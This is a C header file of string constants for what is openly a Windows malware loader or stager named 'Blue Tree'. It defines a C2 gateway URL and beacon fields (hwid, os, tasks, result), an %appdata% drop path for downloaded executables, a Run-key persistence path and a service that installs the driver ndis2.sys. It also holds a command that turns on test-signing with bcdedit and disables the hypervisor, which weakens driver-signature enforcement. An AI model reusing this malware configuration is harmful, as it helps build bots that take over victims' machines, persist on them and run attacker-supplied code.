#define DUMMY_BUF_SIZE 420 
#define MY_DRIVER L"\\\\.\\Malwarez"
#define Domain "127.0.0.1"
#define Alive "/gateway.php"
#define hdrs_str "Content-Type: application/x-www-form-urlencoded #defineset=utf-16"
#define os_str L"%d.%d"
#define INTEL L"Intel"
#define AMD64 L"AMD64"
#define IA64 L"IA64"
#define UNKNOWN L"UNKNOWN"
#define WOW64 L"Wow64"
#define X32 L"x32"
#define http_post_str "%s%S"
#define dll_path_str L"%s\\%s"
#define POST_str "POST"
#define POST_Data "&hwid=%S&env=%S&sys=%S&os=%S"
#define TASKS_STR "tasks"
#define DOWNLOAD_STR L"%S"
#define APPDATA_STR L"%appdata%"
#define EXE_PATH_STR L"%s\\%d.exe"
#define SUCCESS "%s&result=%d&id=%d"
#define NTDLL L"ntdll.dll"
#define ADVAPI32_DLL L"advapi32.dll"
#define KERNEL32_DLL L"kernel32.dll"
#define USER32_DLL L"user32.dll"
#define HEADERS L"Accept: */*\r\n\r\n"
#define WININET_DLL L"wininet.dll"

#define LDRLOADDLL "LdrLoadDll"
#define LDRUNLOADDLL "LdrUnloadDll"
#define RTLINITANSISTRING "RtlInitAnsiString"
#define RTLINITUNICODESTRING "RtlInitUnicodeString"
#define LDRGETPROCEDUREADDRESS "LdrGetProcedureAddress"
#define LDRGETDLLHANDLE "LdrGetDllHandle"
#define RTLGETVERSION "RtlGetVersion"
#define NTQUERYSYSTEMINFORMATION "NtQuerySystemInformation"
#define NTQUERYINFORMATIONPROCESS "NtQueryInformationProcess"
#define NTCREATEFILE "NtCreateFile"
#define NTWRITEFILE "NtWriteFile"
#define NTCLOSE "NtClose"
#define NTCREATETHREADEX "NtCreateThreadEx"
#define RTLDOSPATHNAMETONTPATHNAME_U "RtlDosPathNameToNtPathName_U"
#define GETMODULEFILENAMEW "GetModuleFileNameW"
#define HEAPALLOC "HeapAlloc"
#define HEAPFREE "HeapFree"
#define HEAPDESTROY "HeapDestroy"
#define GETPROCESSHEAP "GetProcessHeap"
#define RTLGENRANDOM "SystemFunction036"
#define WSPRINTFA "wsprintfA"
#define WPSRINTFW "wsprintfW"
#define INTERNETCLOSEHANDLE "InternetCloseHandle"
#define INTERNETCONNECTA "InternetConnectA"
#define HTTPOPENREQUESTA "HttpOpenRequestA"
#define INTERNETREADFILE "InternetReadFile"
#define INTERNETOPENURLW "InternetOpenUrlW"
#define INTERNETOPENA "InternetOpenA"
#define INTERNETOPENW "InternetOpenW"
#define CREATEPROCESSW "CreateProcessW"
#define GETFILEATTRIBUTES "GetFileAttributesW"
#define EXPANDENVIROMENTSTRINGS "ExpandEnvironmentStringsW"
#define HTTPSENDREQUESTA "HttpSendRequestA"
#define HEAPREALLOC "HeapReAlloc"
#define HEAPCREATE "HeapCreate"
#define GETLASTERROR "GetLastError"
#define GETCURRENTHWPROFILEW "GetCurrentHwProfileW"
#define SLEEP "Sleep"
#ifndef DRIVER_CODE
#define STARTUP L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
#endif
#define REGCREATEKEYW "RegCreateKeyW"
#define REGCLOSE "RegCloseKey"
#define REGSETVALUEEXW "RegSetValueExW"




#define OPENSCMANAGERW "OpenSCManagerW"
#define OPENSERVICEW "OpenServiceW"
#define QUERYSERVICESTATUS "QueryServiceStatus"
#define GETCURRENTDIRECTORYW "GetCurrentDirectoryW"
#define CREATESERVICEW "CreateServiceW"
#define CLOSESERVICEHANDLE "CloseServiceHandle"



#define GETEXITCODEPROCESS "GetExitCodeProcess"



#define DSE L"SOFTWARE\\Microsoft\\Driver Signing"
#define POLICY L"Policy"


#define GET_DRIVER L"?driver"

#define SERVICE L"Blue Tree Stager 1"
#define SERVICE_DISPLAY L"Blue Tree"
#define DRIVER_NAME L"ndis2.sys"
#define COMMAND L"cmd.exe bcdedit.exe -set TESTSIGNING ON && bcdedit.exe -set hypervisorlaunchtype off"
#define GATEWAY_URL L"http://somedomain.path/"